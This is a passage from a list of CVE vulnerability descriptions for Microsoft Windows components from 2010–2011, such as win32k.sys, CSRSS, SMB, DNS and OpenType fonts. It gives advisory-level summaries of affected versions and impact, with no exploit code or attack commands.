Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 